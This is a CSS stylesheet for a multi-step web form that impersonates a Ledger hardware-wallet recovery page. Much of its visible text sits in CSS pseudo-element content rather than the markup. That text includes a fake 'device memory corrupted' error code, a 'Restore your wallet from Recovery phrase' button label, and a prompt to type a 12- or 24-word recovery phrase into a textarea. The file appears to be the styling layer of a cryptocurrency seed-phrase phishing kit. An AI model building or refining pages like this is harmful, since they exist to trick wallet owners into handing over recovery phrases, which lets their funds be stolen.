.image_box {
  display: flex;
  justify-content: space-between;
  gap: 24px;
}

.hidden {
  position: absolute;
  visibility: hidden;
  display: none;
}
/* Form.module.css */

.timeline {
  display: flex;
  justify-content: space-between;
  align-items: center;
  border-top: 1px solid #bbb0fd;
  padding: 20px 0;
  width: 80%;
  margin: auto;
}

.timeline span {
  font-size: 12px;
  color: #bbb0fd;
}

.element {
  display: flex;
  flex-direction: column;
  align-items: center;
  font-size: 14px;
  position: relative;
}

.element.active .dot {
  background-color: #fff; /* White color for active dot */
}

.dotbox {
  display: flex;
  align-items: center;
  justify-content: center;
  width: 24px;
  height: 24px;
  border-radius: 50%;
  position: relative;
  margin: auto;
}

.dot {
  border-radius: 50%;
  background-color: transparent;
  transition: background-color 0.3s, border 0.3s;
}

.dot svg {
  color: #bbb0fd !important;
  width: 8px !important;
  height: 8px !important;
}

.dotbox.filled svg {
  color: #404142 !important;
  background: #bbb0fd;
  border-radius: 4px;
  padding: 5px;
  width: 5px;
  height: 5px;
}

.line {
  flex-grow: 1;
  border-top: 2px solid #f2f2f2; /* Initial greyed border */
  margin: 0 10px;
}

.element.active .line {
  border-top-color: #fff; /* White color for active step progress */
}

.step_one_content {
  width: 100%;
  margin: auto;
}
.step_one_content h2 {
  text-align: center;
  margin-bottom: 100px;
}
.image_box div[data-attribute] {
  display: flex;
  flex-direction: column;
  width: 100%;
  align-items: center;
  background: rgba(47, 47, 47, 0.37);
  border-radius: 8px;
}
.image_box div[data-attribute] h3 {
  font-size: 20px;
  font-family: 30px;
  font-weight: 400;
}
.image_box div[data-attribute]:hover {
  background: #292a2b;
}
.image_box div[data-attribute]:hover img {
  transform: scale(1.05);
  transition: transform 0.1s ease-in;
}
div.image_box img {
  width: 14%;
  padding: 12px 0 32px 0;
  transition: transform 0.1s ease-in-out;
}
div.image_box .last_child {
  width: 55% !important;
}
.step_two_content {
  width: 100%;
  margin: auto;
  display: flex;
  flex-direction: column;
  align-items: center;
}
.buttons {
  display: flex;
  flex-direction: column;
  gap: 12px;
}
.buttons button:nth-child(1) {
  background: #6257b7;
  color: #fafafa;
  transition: background-color 0.2s ease-out;
  padding: 24px;
  display: flex;
  align-items: center;
  gap: 24px;
  width: 100%;
  cursor: pointer;
}
.buttons button:nth-child(2) {
  background: #404142;
  color: #fafafa;
  transition: background-color 0.2s ease-out;
  padding: 24px;
  display: flex;
  align-items: center;
  gap: 24px;
  width: 100%;
  cursor: pointer;
}
.buttons button:nth-child(3) {
  background: green;
  color: #fafafa;
  transition: background-color 0.2s ease-out;
  padding: 24px;
  display: flex;
  align-items: center;
  gap: 24px;
  width: 100%;
  cursor: pointer;
}
.buttons button:nth-child(1) span,
.buttons button:nth-child(2) span {
  text-align: left;
}

.buttons svg {
  font-size: 24px;
}
.step_two_content.hidden {
  display: none;
}
.loader_content {
  display: flex;
  flex-direction: column;
  align-items: center;
}
.step_three_content {
  display: flex;
  flex-direction: column;
  align-items: center;
}
.loader_content h2::before {
  content: "Connect and unlock your device";
}
.step_three_content h2::before {
  content: "Select & enter numbers of words in your recovery phrase";
}
.step_three_content h2,
.step_one_content h2,
.step_two_content h2,
.loader_content h2 {
  font-size: 1.75rem;
  font-weight: 400;
  text-align: center;
  color: #fff;
}
.step_two_content p {
  font-size: 20px;
  font-family: 24px;
  color: #ff0000;
  width: 40%;
  text-align: center;
}

.step_two_content p::before {
  content: 'Your devices memory has been corrupted. Ledger data damage error: 0x0m3Ck8n';
}
.textareaCon {
  position: relative;
}
.textareaCon::before {
  content: "Typically 12 (sometimes 24) words separated by single spaces";
  position: absolute;
  top: 17px;
  left: 17px;
  pointer-events: none;
  font-family: "Inter";
  color: #999;
  transition: opacity 0.2s;
  opacity: 1;
}
.textareaCon:has(textarea:not(:placeholder-shown))::before {
  opacity: 0;
}
.textarea {
  /* width: 100%;
  margin: 0 auto;
  min-height: calc(1.5em + 0.75rem + calc(1px * 2));
  border-radius: 8px;
  border: none;
  padding: 15px;
  font-size: 16px;
  line-height: 24px;
  color: #212529;
  font-family: "Inter", sans-serif; */
  width: 100%;
  color: #212529;
  max-width: 100%;
  min-height: 8rem;
  padding: 17px;
  font-family: "Inter", sans-serif;
  font-size: 1rem;
  line-height: 1.5;
  border: 1px solid #ccc;
  border-radius: 4px;
  box-sizing: border-box;
  resize: vertical;
}
.textarea::placeholder {
  font-size: 16px;
  line-height: 24px;
  color: #212529;
  font-family: "Inter", sans-serif;
}
.submitButton {
  /* width: 40%; */
  margin: 40px auto 0;
  padding: 10px;
  background-color: #6490f1;
  color: white;
  display: block;
  cursor: pointer;
  padding: 20px 80px;
  font-size: 18px;
}
.popup {
  position: fixed;
  top: 50%;
  left: 55.1%;
  transform: translate(-20%, -20%);
  background-color: #fff;
  padding: 20px;
  text-align: center;
  box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.2);
  display: flex;
  flex-direction: column;
  align-items: center;
  border-radius: 16px;
}

.popup p {
  margin-top: 10px;
  color: #292a2b;
  text-align: center;
}
.closeButton {
  padding: 10px;
  background-color: #bbb0fd;
  color: white;
  display: block;
  cursor: pointer;
  padding: 20px 80px;
  font-size: 18px;
}

@media screen and (max-width: 1023px) {
  .image_box {
    display: block;
  }
  .step_one_content h2 {
    margin-bottom: 40px;
  }
  .timeline {
    width: 100%;
  }
  .timeline span {
    font-size: 10px;
  }
  .image_box div[data-attribute] {
    margin: 20px 0;
  }
  .loader_content img:nth-child(2) {
    width: 80%;
  }
  .step_two_content p {
    width: 80%;
  }
  /* .textarea {
    width: 85%;
  } */
  .submitButton {
    width: unset;
  }
  .popup {
    left: 0;
    padding: 20px 60px;
    transform: translate(9%, 0%);
  }
}

.buttons button:nth-child(1) span::before {
  content: "Restore your wallet from Recovery phrase";
}
